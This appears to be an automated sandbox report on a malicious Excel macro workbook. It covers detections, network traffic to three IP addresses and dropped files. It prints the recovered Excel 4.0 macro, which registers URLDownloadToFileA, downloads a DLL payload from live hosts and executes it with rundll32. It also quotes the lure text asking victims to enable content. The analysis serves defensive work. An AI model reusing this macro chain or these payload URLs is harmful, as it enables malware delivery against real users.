
Analysis Report 9177284661-04302021.xlsm

Overview

General Information

Sample Name: 9177284661-04302021.xlsm
Analysis ID: 403443
MD5: a8b4e37766d35b543884d8882147eaa2
SHA1: 4356c14118ea9098dabb6d9af620003b7929058a
SHA256: 533c8713c4e10c223a9f8139f9d408ca326aee14a1d88382c91f2ff18cf0f93c

Detection

Hidden Macro 4.0
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malicious Excel 4.0 Macro
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Found Excel 4.0 Macro with suspicious formulas
Yara detected MalDoc1
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2156 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
sheet3.xml | JoeSecurity_MalDoc_1 | Yara detected MalDoc_1 | Joe Security |
sharedStrings.xml | JoeSecurity_MalDoc_1 | Yara detected MalDoc_1 | Joe Security |

Sigma Overview

No Sigma rule has matched

Signature Overview


AV Detection:

Multi AV Scanner detection for domain / URL
Source: http://185.45.193.80/44313,6048108796.dat | Virustotal: Detection: 6%
Source: http://45.144.31.232/44313,6048108796.dat | Virustotal: Detection: 8%
Multi AV Scanner detection for submitted file
Source: 9177284661-04302021.xlsm | Virustotal: Detection: 38%
Source: 9177284661-04302021.xlsm | ReversingLabs: Detection: 31%
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities:

Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 185.45.193.80:80

Networking:

Yara detected MalDoc1
Source: Yara match | File source: sheet3.xml, type: SAMPLE
Source: Yara match | File source: sharedStrings.xml, type: SAMPLE
Source: global traffic | HTTP traffic detected:
GET /44313,6048108796.dat HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 185.45.193.80
Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
GET /44313,6048108796.dat HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 45.144.31.232
Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 185.45.193.80
Source: unknown | TCP traffic detected without corresponding DNS query: 82.118.21.70
Source: unknown | TCP traffic detected without corresponding DNS query: 45.144.31.232
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\307513F9.jpg

System Summary:

Found malicious Excel 4.0 Macro
Source: 9177284661-04302021.xlsm | Initial sample: urlmon
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 | Screenshot OCR: Enable editing button from the yellow bar above 22 0 Once you have enabled editing please click Ena
Source: Screenshot number: 4 | Screenshot OCR: Enable Content button from the yellow bar above 23 24 25 26 27 28 29 30 31 32 33 34 35
Found Excel 4.0 Macro with suspicious formulas
Source: 9177284661-04302021.xlsm | Initial sample: EXEC
Source: 9177284661-04302021.xlsm | OLE, VBA macro line: Public Function Auto_Open()
Source: 9177284661-04302021.xlsm | OLE indicator, VBA macros: true
Source: classification engine | Classification label: mal84.troj.expl.evad.winXLSM@1/7@0/3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$9177284661-04302021.xlsm
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVREBA5.tmp
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: 9177284661-04302021.xlsm | Virustotal: Detection: 38%
Source: 9177284661-04302021.xlsm | ReversingLabs: Detection: 31%
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: 9177284661-04302021.xlsm | Initial sample: OLE zip file path = xl/media/image1.jpg
Source: 9177284661-04302021.xlsm | Initial sample: OLE zip file path = xl/drawings/drawing2.xml
Source: 9177284661-04302021.xlsm | Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: 9177284661-04302021.xlsm | Initial sample: OLE zip file path = xl/drawings/_rels/drawing2.xml.rels
Source: 9177284661-04302021.xlsm | Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX

Mitre Att&ck Matrix

Techniques listed per tactic column (bracketed figures are the counts displayed in the matrix cells):

Initial Access: Valid Accounts; Default Accounts; Domain Accounts
Execution: Scripting [22]; Exploitation for Client Execution [12]; At (Linux)
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows)
Privilege Escalation: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows)
Defense Evasion: Masquerading [1]; Disable or Modify Tools [1]; Scripting [22]
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager
Discovery: File and Directory Discovery [1]; System Information Discovery [1]; Query Registry
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration
Command and Control: Non-Application Layer Protocol [1]; Application Layer Protocol [11]; Ingress Tool Transfer [2]
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data

Behavior Graph


Screenshots


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label | Link
9177284661-04302021.xlsm | 39% | Virustotal | | Browse
9177284661-04302021.xlsm | 32% | ReversingLabs | Document-Office.Trojan.Valyria |

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label | Link
http://185.45.193.80/44313,6048108796.dat | 7% | Virustotal | | Browse
http://185.45.193.80/44313,6048108796.dat | 0% | Avira URL Cloud | safe |
http://45.144.31.232/44313,6048108796.dat | 8% | Virustotal | | Browse
http://45.144.31.232/44313,6048108796.dat | 0% | Avira URL Cloud | safe |

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://185.45.193.80/44313,6048108796.dat | true | 7%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://45.144.31.232/44313,6048108796.dat | true | 8%, Virustotal, Browse; Avira URL Cloud: safe | unknown

Contacted IPs


Public

IP | Domain | Country | ASN | ASN Name | Malicious
82.118.21.70 | unknown | Ukraine | 204957 | GREENFLOID-ASUA | false
45.144.31.232 | unknown | United Kingdom | 42994 | HQservCommunicationSolutionsIL | false
185.45.193.80 | unknown | United Arab Emirates | 60117 | HSAE | false

General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 403443
Start date: 04.05.2021
Start time: 06:07:09
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 4m 45s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: 9177284661-04302021.xlsm
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Run name: Without Instrumentation
Number of new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal84.troj.expl.evad.winXLSM@1/7@0/3
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsm
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
82.118.21.70 | 9177284661-04302021.xlsm | Get hash | malicious | Browse |
45.144.31.232 | 9177284661-04302021.xlsm | Get hash | malicious | Browse | 45.144.31.232/44313,6048108796.dat
45.144.31.232 | 9177284661-04302021.xlsm | Get hash | malicious | Browse | 45.144.31.232/44313,6048108796.dat
185.45.193.80 | 9177284661-04302021.xlsm | Get hash | malicious | Browse | 185.45.193.80/44313,6048108796.dat
185.45.193.80 | 9177284661-04302021.xlsm | Get hash | malicious | Browse | 185.45.193.80/44313,6048108796.dat

Domains

No context

ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
GREENFLOID-ASUA | 9177284661-04302021.xlsm | Get hash | malicious | Browse | 82.118.21.70
GREENFLOID-ASUA | 9177284661-04302021.xlsm | Get hash | malicious | Browse | 82.118.21.70
HSAE | 9177284661-04302021.xlsm | Get hash | malicious | Browse | 185.45.193.80
HSAE | 9177284661-04302021.xlsm | Get hash | malicious | Browse | 185.45.193.80
HQservCommunicationSolutionsIL | 9177284661-04302021.xlsm | Get hash | malicious | Browse | 45.144.31.232
HQservCommunicationSolutionsIL | 9177284661-04302021.xlsm | Get hash | malicious | Browse | 45.144.31.232

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\307513F9.jpg
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 1080x1080, frames 3
Category: dropped
Size (bytes): 92379
Entropy (8bit): 7.654577060340879
Encrypted: false
SSDEEP: 1536:1o1vutINbjOXGw548LBkVb/oyrKXkX89DcO9GQSnIv+C1EDFVxkR7Y90:wvKINbjvw548LMb/oqKO8NnS8+60Kc0
MD5: 4A425E6A5A885C0D0E2589506FD2244B
SHA1: E23482422480A4720E22F311B42BD65E2F3556F8
SHA-256: 76E685FC2035D8CF19945C6686D82054B64D0A9612853D8F428C4B4FE351C160
SHA-512: 3C827E13A12CC817CBD80EA7C89BEC5288FD21250728E76E00D6355008F704C77EC9BC37C85FF076D8D1F960DB53741F352AB649CD2C754B71B4D11CFFBEEA54
Malicious: false
Reputation: moderate, very likely benign file
C:\Users\user\AppData\Local\Temp\36FE0000
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 115187
Entropy (8bit): 7.679292531575217
Encrypted: false
SSDEEP: 3072:GmklPrvKINbjvw548LMb/oqKO8NnS8+60Kco:GXlPmAbT648LM7D98Np+EV
MD5: 367124A82FB758FF6258AF0E59AE4984
SHA1: E564A4A621945BBEF791627494B5EB9B6E3751A8
SHA-256: 3137E11555F26792D03FD0DA41051C2D14BDAD48B43D3AFE83B4DD773E460EB3
SHA-512: 9D7BCD921C9F226E96A56DA5532EA908D9B195E961DED751D4C3293598F31BFBB84D146330014E2CA369D1C84C5F28302E4E571214F68C26458B7614589CC2EC
Malicious: false
Reputation: low
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\9177284661-04302021.LNK
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:21 2020, mtime=Tue May 4 12:07:48 2021, atime=Tue May 4 12:07:48 2021, length=115178, window=hide
Category: modified
Size (bytes): 2128
Entropy (8bit): 4.508132440715174
Encrypted: false
SSDEEP: 24:8h/XT46kd2zvgHei6Dv3qfdM7dD2h/XT46kd2zvgHei6Dv3qfdM7dV:8h/XTDkd2zIHjfQh2h/XTDkd2zIHjfQ/
MD5: DFFA4091157334F9379C1F8625BF466E
SHA1: DFF23F9DAD76202B8D01253514E6BCB497EA86BB
SHA-256: E22B406F66EF6059A88E5C3B56769781FFD37E6BD683A706A32FAAF0585FE189
SHA-512: CA790643D67ECE59AE54239D668811021F5CBC6B20C764BA115D8BFB0453924018769FBE5CC980452D534617E00F23C2D3292121C70BE74F06D93D415876A19C
Malicious: false
Reputation: low
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue May 4 12:07:48 2021, atime=Tue May 4 12:07:48 2021, length=8192, window=hide
Category: dropped
Size (bytes): 867
Entropy (8bit): 4.497838446554197
Encrypted: false
SSDEEP: 12:85QYmTLgXg/XAlCPCHaXIB8kB/ZEX+WnicvbwbDtZ3YilMMEpxRljK6TdJP9TdJ2:85QB/XT46ksYegDv3qfrNru/
MD5: 4A5D1CA67C8F7DD86F9537341DFF7FB6
SHA1: 48A579342370E5587F0B882734E7F559AD757B04
SHA-256: 3C0A8B4B90B2BFFC956C08EB9669552E0AC4FAC437F1683F530A6679E10AD514
SHA-512: 09F94DFFA40355CCA95D649D136498AA8C90C12B1780D40B9076D78F062421D02E956B83794C3F36532A70EFD030DFBFC0866D1EC77A4D2068DFE8D58EE47E93
Malicious: false
Reputation: low
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 112
Entropy (8bit): 4.517286360501819
Encrypted: false
SSDEEP: 3:oyBVomxW7SNRfRg9rlNRfRg9rlmxW7SNRfRg9rlv:djQc2pZ2pZc2p1
MD5: 3C738600E2C168DA464E5F6B8D1F5BFE
SHA1: B8A71D217EFB558FAAA522D9F116879690781851
SHA-256: B426222C318FCE644598521ECE3647859958E71F0B282931B26E02193B2BC4E0
SHA-512: 4E9DA68D7BA28E7FD8B14F57CD85CE1BECDD1DE65C95E35976DCB98C57F6105ED51553D016BEAC78892A57F318E4A47D314A368C13AFC45F176E18836BAB44C0
Malicious: false
Reputation: low
Preview: Desktop.LNK=0..[misc]..9177284661-04302021.LNK=0..9177284661-04302021.LNK=0..[misc]..9177284661-04302021.LNK=0..
C:\Users\user\Desktop\27FE0000
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 115178
Entropy (8bit): 7.678968868760752
Encrypted: false
SSDEEP: 3072:GmkVMarvKINbjvw548LMb/oqKO8NnS8+60Kcd:GXVMamAbT648LM7D98Np+Eg
MD5: 5029202D94871712FACF97B7D903C7AC
SHA1: 027869644EAEFD731271C79B74CF56A1946DA0BE
SHA-256: 7715EF04371DA547D7B093A17659468A166566B723B7D2CFC986DEDDA3F80DCC
SHA-512: 29E24F14E911A20D2D5202FA5933AEEE73951B8C3CB94EE27F7636815477F05E22F8A7E08D6C5BDE4851B1FD40A30EE3C9C072E7BF22B04F1C0BCF378CAA2DF9
Malicious: false
Reputation: low
C:\Users\user\Desktop\~$9177284661-04302021.xlsm
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 330
Entropy (8bit): 1.4377382811115937
Encrypted: false
SSDEEP: 3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5: 96114D75E30EBD26B572C1FC83D1D02E
SHA1: A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256: 0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512: 52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious: true
Reputation: high, very likely benign file
        Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

        Static File Info

        General

        File type:Microsoft Excel 2007+
        Entropy (8bit):7.679226664040162
        TrID:
        • Excel Microsoft Office Open XML Format document with Macro (57504/1) 54.50%
        • Excel Microsoft Office Open XML Format document (40004/1) 37.92%
        • ZIP compressed archive (8000/1) 7.58%
        File name:9177284661-04302021.xlsm
        File size:114788
        MD5:a8b4e37766d35b543884d8882147eaa2
        SHA1:4356c14118ea9098dabb6d9af620003b7929058a
        SHA256:533c8713c4e10c223a9f8139f9d408ca326aee14a1d88382c91f2ff18cf0f93c
        SHA512:581ee69b843a7657677e1f6b74147f273f340474ff36de56b1d579d0364ccc6c27c2f9dedf4d855bc2841351957a3620dc0327153ff4ff3dc87a2c6ad7eb8a6f
        SSDEEP:3072:K6vKINbjvw548LMb/oqKO8NnS8+60Kcxtc:6AbT648LM7D98Np+Et
        File Content Preview:PK..........!."..R....*.......[Content_Types].xml ...(.........................................................................................................................................................................................................

        File Icon

        Icon Hash:e4e2aa8aa4bcbcac

        Static OLE Info

        General

        Document Type:OpenXML
        Number of OLE Files:1

        OLE File "/opt/package/joesandbox/database/analysis/403443/sample/9177284661-04302021.xlsm"

        Indicators

        Has Summary Info:False
        Application Name:unknown
        Encrypted Document:False
        Contains Word Document Stream:
        Contains Workbook/Book Stream:
        Contains PowerPoint Document Stream:
        Contains Visio Document Stream:
        Contains ObjectPool Stream:
        Flash Objects Count:
        Contains VBA Macros:True

        Summary

        Author:Rabota
        Last Saved By:Noped
        Create Time:2015-06-05T18:19:34Z
        Last Saved Time:2021-04-30T08:26:34Z
        Creating Application:Microsoft Excel
        Security:0

        Document Summary

        Thumbnail Scaling Desired:false
        Company:
        Contains Dirty Links:false
        Shared Document:false
        Changed Hyperlinks:false
        Application Version:16.0300

        Streams with VBA

        VBA File Name: Byutut.bas, Stream Size: 1343
        General
        Stream Path:VBA/Byutut
        VBA File Name:Byutut.bas
        Stream Size:1343

        VBA Code Keywords

        Keyword
        Function
        Application.Run
        Attribute
        Auto_Open()
        VB_Name
        "Byutut"
        Public
        VBA Code
        VBA File Name: Class1.cls, Stream Size: 999
        General
        Stream Path:VBA/Class1
        VBA File Name:Class1.cls
        Stream Size:999

        VBA Code Keywords

        Keyword
        False
        VB_Exposed
        Attribute
        VB_Name
        VB_Creatable
        VB_PredeclaredId
        VB_GlobalNameSpace
        VB_Base
        VB_Customizable
        VB_TemplateDerived
        VBA Code

        Streams

        Stream Path: PROJECT, File Type: ISO-8859 text, with CRLF line terminators, Stream Size: 543
        General
        Stream Path:PROJECT
        File Type:ISO-8859 text, with CRLF line terminators
        Stream Size:543
        Entropy:5.37319650849
        Base64 Encoded:True
        Data ASCII:I D = " { 6 5 E C 9 F D C - 2 0 9 0 - 4 6 C 0 - 8 5 8 F - 4 1 2 6 6 D 3 E 0 1 6 B } " . . D o c u m e n t = . . . . . . . . / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = . . . . 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = B y u t u t . . D o c u m e n t = . . . . 2 / & H 0 0 0 0 0 0 0 0 . . C l a s s = C l a s s 1 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 0 9 0 B D 9 D F D D D F D D D F D D D F D D
        Stream Path: PROJECTwm, File Type: data, Stream Size: 107
        General
        Stream Path:PROJECTwm
        File Type:data
        Stream Size:107
        Entropy:3.96151942936
        Base64 Encoded:False
        Data ASCII:. . . . . . . . . - . B . 0 . . . = . 8 . 3 . 0 . . . . . . . 1 . . . 8 . A . B . 1 . . . B y u t u t . B . y . u . t . u . t . . . . . . . 2 . . . 8 . A . B . 2 . . . C l a s s 1 . C . l . a . s . s . 1 . . . . .
        Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 2831
        General
        Stream Path:VBA/_VBA_PROJECT
        File Type:data
        Stream Size:2831
        Entropy:4.1308794712
        Base64 Encoded:False
        Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
        Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 1642
        General
        Stream Path:VBA/__SRP_0
        File Type:data
        Stream Size:1642
        Entropy:3.30953727146
        Base64 Encoded:False
        Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 146
        General
        Stream Path:VBA/__SRP_1
        File Type:data
        Stream Size:146
        Entropy:1.48909835582
        Base64 Encoded:False
        Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 170
        General
        Stream Path:VBA/__SRP_2
        File Type:data
        Stream Size:170
        Entropy:1.65437585425
        Base64 Encoded:False
        Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 156
        General
        Stream Path:VBA/__SRP_3
        File Type:data
        Stream Size:156
        Entropy:1.63365900945
        Base64 Encoded:False
        Stream Path: VBA/dir, File Type: data, Stream Size: 601
        General
        Stream Path:VBA/dir
        File Type:data
        Stream Size:601
        Entropy:6.45605461621
        Base64 Encoded:True
        Data ASCII:. U . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . O ~ b . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
        Stream Path: VBA/\x1051\x1080\x1089\x10901, File Type: data, Stream Size: 990
        General
        Stream Path:VBA/\x1051\x1080\x1089\x10901
        File Type:data
        Stream Size:990
        Entropy:3.19675892958
        Base64 Encoded:True
        Stream Path: VBA/\x1051\x1080\x1089\x10902, File Type: data, Stream Size: 990
        General
        Stream Path:VBA/\x1051\x1080\x1089\x10902
        File Type:data
        Stream Size:990
        Entropy:3.19281939975
        Base64 Encoded:True
        Stream Path: VBA/\x1069\x1090\x1072\x1050\x1085\x1080\x1075\x1072, File Type: data, Stream Size: 994
        General
        Stream Path:VBA/\x1069\x1090\x1072\x1050\x1085\x1080\x1075\x1072
        File Type:data
        Stream Size:994
        Entropy:3.21355105334
        Base64 Encoded:True

        Macro 4.0 Code

        ,,,1,,,,,,9,,,"=ON.TIME(NOW()+""00:00:02"",""Milolos"")",,,,,,,,=NOW(),,,,,,"=FORMULA(AH84&AH85&AH86,AJ76)",,,,=HALT(),"=CONCATENATE(AH79,AI71,AH77,AH78)",,,,,,"=CONCATENATE(AH80,AI71,AH77,AH78)",,,,,,"=CONCATENATE(AH81,AI71,AH77,AH78)",,uRlMon,,,,,,,,,,.d,,JJCCBB,,,,at,,Belandes,,,,"=""http://185.45.193.80/""",,,,,,http://82.118.21.70/,=GOTO(Blodas!G6),,,,,http://45.144.31.232/,,..\Niolas.dll,,,,,,,,,,,,,,,,"=""UR""",,,,,,"=""LDownloadT""",,,,,,"=""oFileA""",,,,,
        "=REGISTER(Nyukasl!AJ75,Nyukasl!AJ76,Nyukasl!AJ77,Nyukasl!AJ78,,Nyukasl!AJ68,9)""=Belandes(0,Nyukasl!AH73,Nyukasl!AJ81,0,0)""=IF(G12<0, Belandes(0,Nyukasl!AH74,Nyukasl!AJ81,0,0))""=IF(G13<0, Belandes(0,Nyukasl!AH75,Nyukasl!AJ81,0,0))""=IF(G14<0,CLOSE(0),)"=GOTO(Jioka!H4)
        ,"=""rund""",,"=""ll32 ..\Niolas.dll""","="",DllRegisterServer""",,,,,=PI()=EXEC(I7&I9&I10)=PI(),,,,=HALT(),

        Network Behavior

        Snort IDS Alerts

        Timestamp                 Protocol  SID   Message                         Source Port  Dest Port  Source IP      Dest IP
        05/04/21-06:08:13.109990  TCP       1201  ATTACK-RESPONSES 403 Forbidden  80           49167      185.45.193.80  192.168.2.22
        05/04/21-06:08:55.449467  TCP       1201  ATTACK-RESPONSES 403 Forbidden  80           49170      45.144.31.232  192.168.2.22

        Network Port Distribution

        TCP Packets

        Timestamp                            Source Port  Dest Port  Source IP      Dest IP
        May 4, 2021 06:08:12.773962021 CEST  49167        80         192.168.2.22   185.45.193.80
        May 4, 2021 06:08:12.827069998 CEST  80           49167      185.45.193.80  192.168.2.22
        May 4, 2021 06:08:12.827166080 CEST  49167        80         192.168.2.22   185.45.193.80
        May 4, 2021 06:08:12.827898979 CEST  49167        80         192.168.2.22   185.45.193.80
        May 4, 2021 06:08:12.880856037 CEST  80           49167      185.45.193.80  192.168.2.22
        May 4, 2021 06:08:13.109989882 CEST  80           49167      185.45.193.80  192.168.2.22
        May 4, 2021 06:08:13.110054970 CEST  49167        80         192.168.2.22   185.45.193.80
        May 4, 2021 06:08:13.164747953 CEST  49168        80         192.168.2.22   82.118.21.70
        May 4, 2021 06:08:16.158328056 CEST  49168        80         192.168.2.22   82.118.21.70
        May 4, 2021 06:08:22.164798975 CEST  49168        80         192.168.2.22   82.118.21.70
        May 4, 2021 06:08:34.163988113 CEST  49169        80         192.168.2.22   82.118.21.70
        May 4, 2021 06:08:37.220105886 CEST  49169        80         192.168.2.22   82.118.21.70
        May 4, 2021 06:08:43.226696014 CEST  49169        80         192.168.2.22   82.118.21.70
        May 4, 2021 06:08:55.272788048 CEST  49170        80         192.168.2.22   45.144.31.232
        May 4, 2021 06:08:55.353645086 CEST  80           49170      45.144.31.232  192.168.2.22
        May 4, 2021 06:08:55.353738070 CEST  49170        80         192.168.2.22   45.144.31.232
        May 4, 2021 06:08:55.354362965 CEST  49170        80         192.168.2.22   45.144.31.232
        May 4, 2021 06:08:55.438755035 CEST  80           49170      45.144.31.232  192.168.2.22
        May 4, 2021 06:08:55.449466944 CEST  80           49170      45.144.31.232  192.168.2.22
        May 4, 2021 06:08:55.449620008 CEST  49170        80         192.168.2.22   45.144.31.232
        May 4, 2021 06:09:18.112318993 CEST  80           49167      185.45.193.80  192.168.2.22
        May 4, 2021 06:09:18.112449884 CEST  49167        80         192.168.2.22   185.45.193.80
        May 4, 2021 06:10:00.456397057 CEST  80           49170      45.144.31.232  192.168.2.22
        May 4, 2021 06:10:00.456571102 CEST  49170        80         192.168.2.22   45.144.31.232
        May 4, 2021 06:10:12.685563087 CEST  49170        80         192.168.2.22   45.144.31.232
        May 4, 2021 06:10:12.685642958 CEST  49167        80         192.168.2.22   185.45.193.80
        May 4, 2021 06:10:12.740024090 CEST  80           49167      185.45.193.80  192.168.2.22
        May 4, 2021 06:10:12.767723083 CEST  80           49170      45.144.31.232  192.168.2.22

        HTTP Request Dependency Graph

        • 185.45.193.80
        • 45.144.31.232

        HTTP Packets

        Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
        0           192.168.2.22  49167        185.45.193.80   80                C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        Timestamp                            kBytes transferred  Direction  Data
        May 4, 2021 06:08:12.827898979 CEST  0                   OUT        GET /44313,6048108796.dat HTTP/1.1
        Accept: */*
        UA-CPU: AMD64
        Accept-Encoding: gzip, deflate
